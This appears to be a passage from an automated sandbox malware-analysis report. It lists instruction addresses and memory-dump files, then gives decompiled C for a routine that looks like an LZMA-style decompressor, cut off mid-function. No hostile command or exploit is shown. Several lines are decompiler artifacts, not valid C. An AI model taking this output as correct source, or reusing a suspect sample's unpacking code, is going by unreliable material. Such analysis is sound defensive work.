                                                          0x0040708a
                                                          0x00407091
                                                          0x00000000
                                                          0x00000000
                                                          0x00407096
                                                          0x00407096
                                                          0x0040709a
                                                          0x004071d2
                                                          0x00000000
                                                          0x004071d2
                                                          0x004070a0
                                                          0x004070a3
                                                          0x004070a6
                                                          0x004070aa
                                                          0x004070ad
                                                          0x004070b3
                                                          0x004070b5
                                                          0x004070b5
                                                          0x004070b5
                                                          0x004070b8
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070bb
                                                          0x004070be
                                                          0x004070be
                                                          0x004070c2
                                                          0x00407122
                                                          0x00407125
                                                          0x0040712a
                                                          0x0040712b
                                                          0x0040712d
                                                          0x0040712f
                                                          0x00407132
                                                          0x00000000
                                                          0x00407132
                                                          0x004070c4
                                                          0x004070ca
                                                          0x004070cd
                                                          0x004070d0
                                                          0x004070d3
                                                          0x004070d6
                                                          0x004070d9
                                                          0x004070dc
                                                          0x004070df
                                                          0x004070e2
                                                          0x004070e5
                                                          0x004070fe
                                                          0x00407101
                                                          0x00407104
                                                          0x00407107
                                                          0x0040710b
                                                          0x0040710d
                                                          0x0040710d
                                                          0x0040710e
                                                          0x00407111
                                                          0x004070e7
                                                          0x004070e7
                                                          0x004070ef
                                                          0x004070f4
                                                          0x004070f6
                                                          0x004070f9
                                                          0x004070f9
                                                          0x00407114
                                                          0x0040711b
                                                          0x00000000
                                                          0x0040711d
                                                          0x00000000
                                                          0x0040711d
                                                          0x00000000
                                                          0x00406db9
                                                          0x00406dbc
                                                          0x00406df2
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f22
                                                          0x00406f25
                                                          0x00406f25
                                                          0x00406f28
                                                          0x00406f2a
                                                          0x004071b4
                                                          0x00000000
                                                          0x004071b4
                                                          0x00406f30
                                                          0x00406f33
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f39
                                                          0x00406f3d
                                                          0x00406f40
                                                          0x00406f40
                                                          0x00406f40
                                                          0x00000000
                                                          0x00406f40
                                                          0x00406dbe
                                                          0x00406dc0
                                                          0x00406dc2
                                                          0x00406dc4
                                                          0x00406dc7
                                                          0x00406dc8
                                                          0x00406dca
                                                          0x00406dcc
                                                          0x00406dcf
                                                          0x00406dd2
                                                          0x00406de8
                                                          0x00406ded
                                                          0x00406e25
                                                          0x00406e25
                                                          0x00406e29
                                                          0x00406e55
                                                          0x00406e57
                                                          0x00406e5e
                                                          0x00406e61
                                                          0x00406e64
                                                          0x00406e64
                                                          0x00406e69
                                                          0x00406e69
                                                          0x00406e6b
                                                          0x00406e6e
                                                          0x00406e75
                                                          0x00406e78
                                                          0x00406ea5
                                                          0x00406ea5
                                                          0x00406ea8
                                                          0x00406eab
                                                          0x00406f1f
                                                          0x00406f1f
                                                          0x00406f1f
                                                          0x00000000
                                                          0x00406f1f
                                                          0x00406ead
                                                          0x00406eb3
                                                          0x00406eb6
                                                          0x00406eb9
                                                          0x00406ebc
                                                          0x00406ebf
                                                          0x00406ec2
                                                          0x00406ec5
                                                          0x00406ec8
                                                          0x00406ecb
                                                          0x00406ece
                                                          0x00406ee7
                                                          0x00406ee9
                                                          0x00406eec
                                                          0x00406eed
                                                          0x00406ef0
                                                          0x00406ef2
                                                          0x00406ef5
                                                          0x00406ef7
                                                          0x00406ef9
                                                          0x00406efc
                                                          0x00406efe
                                                          0x00406f01
                                                          0x00406f05
                                                          0x00406f07
                                                          0x00406f07
                                                          0x00406f08
                                                          0x00406f0b
                                                          0x00406f0e
                                                          0x00406ed0
                                                          0x00406ed0
                                                          0x00406ed8
                                                          0x00406edd
                                                          0x00406edf
                                                          0x00406ee2
                                                          0x00406ee2
                                                          0x00406f11
                                                          0x00406f18
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00406ea2
                                                          0x00000000
                                                          0x00406f1a
                                                          0x00000000
                                                          0x00406f1a
                                                          0x00406f18
                                                          0x00406e2b
                                                          0x00406e2e
                                                          0x00406e30
                                                          0x00406e33
                                                          0x00406e36
                                                          0x00406e39
                                                          0x00406e3b
                                                          0x00406e3e
                                                          0x00406e41
                                                          0x00406e41
                                                          0x00406e44
                                                          0x00406e44
                                                          0x00406e47
                                                          0x00406e4e
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00406e22
                                                          0x00000000
                                                          0x00406e50
                                                          0x00000000
                                                          0x00406e50
                                                          0x00406e4e
                                                          0x00406dd4
                                                          0x00406dd7
                                                          0x00406dd9
                                                          0x00406ddc
                                                          0x00000000
                                                          0x00000000
                                                          0x00406b3b
                                                          0x00406b3b
                                                          0x00406b3f
                                                          0x00407184
                                                          0x00000000
                                                          0x00407184
                                                          0x00406b45
                                                          0x00406b48
                                                          0x00406b4b
                                                          0x00406b4e
                                                          0x00406b51
                                                          0x00406b54
                                                          0x00406b57
                                                          0x00406b59
                                                          0x00406b5c
                                                          0x00406b5f
                                                          0x00406b62
                                                          0x00406b64
                                                          0x00406b64
                                                          0x00406b64
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f43
                                                          0x00406f43
                                                          0x00406f43
                                                          0x00406f47
                                                          0x00000000
                                                          0x00000000
                                                          0x00406f4d
                                                          0x00406f50
                                                          0x00406f53
                                                          0x00406f56
                                                          0x00406f58
                                                          0x00406f58
                                                          0x00406f58
                                                          0x00406f5b
                                                          0x00406f5e
                                                          0x00406f61
                                                          0x00406f64
                                                          0x00406f67
                                                          0x00406f6a
                                                          0x00406f6b
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f6d
                                                          0x00406f70
                                                          0x00406f73
                                                          0x00406f76
                                                          0x00406f79
                                                          0x00406f7c
                                                          0x00406f80
                                                          0x00406f82
                                                          0x00406f85
                                                          0x00000000
                                                          0x00406f87
                                                          0x00000000
                                                          0x00406f87
                                                          0x00406f85
                                                          0x004071ba
                                                          0x00000000
                                                          0x00000000
                                                          0x004067e9

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.644793479.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.644775997.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644817233.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644827494.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 00000002.00000002.644985828.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fcab.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                          • Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
                                                          • Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                                          • Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004067A7 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 98%
                                                          			E004067A7(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004071F9))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8); // executed
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
